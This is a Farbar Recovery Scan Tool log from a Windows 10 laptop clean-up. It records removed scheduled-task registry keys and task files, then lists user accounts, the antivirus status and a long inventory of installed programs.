"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5B6A393D-57E5-4198-BD7E-00E0B9EF3F77}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B6A393D-57E5-4198-BD7E-00E0B9EF3F77}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5BD1D165-089F-40BA-8D52-B90C85B1BB0D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BD1D165-089F-40BA-8D52-B90C85B1BB0D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6D890055-866E-4872-979D-B8AB3884F1DC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D890055-866E-4872-979D-B8AB3884F1DC}" => key removed successfully
C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WMMAWVKOLXONAOYC" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{874B492C-C094-4938-A93E-0F5141822989}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{874B492C-C094-4938-A93E-0F5141822989}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BE0F7D0B-3323-406F-AAEF-1A12388A1C9C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE0F7D0B-3323-406F-AAEF-1A12388A1C9C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D3ACB7DB-7815-42A9-A39F-8D89E1EDF573}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D3ACB7DB-7815-42A9-A39F-8D89E1EDF573}" => key removed successfully
C:\WINDOWS\System32\Tasks\Pritc => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pritc" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D92D97F2-2EDF-4800-82E5-E726F16D0395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D92D97F2-2EDF-4800-82E5-E726F16D0395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E86953B2-7A47-4920-B975-308AAEEA66E9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E86953B2-7A47-4920-B975-308AAEEA66E9}" => key removed successfully
C:\WINDOWS\System32\Tasks\BJZJKCUBLH1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BJZJKCUBLH1" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LuckyTab => key not found. 
C:\WINDOWS\Tasks\BJZJKCUBLH1.job => moved successfully
C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => moved successfully
"C:\ProgramData\Service1291" => not found.
EmptyTemp: => 2.3 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 20:28:55 ====
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-14 18:41:54)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
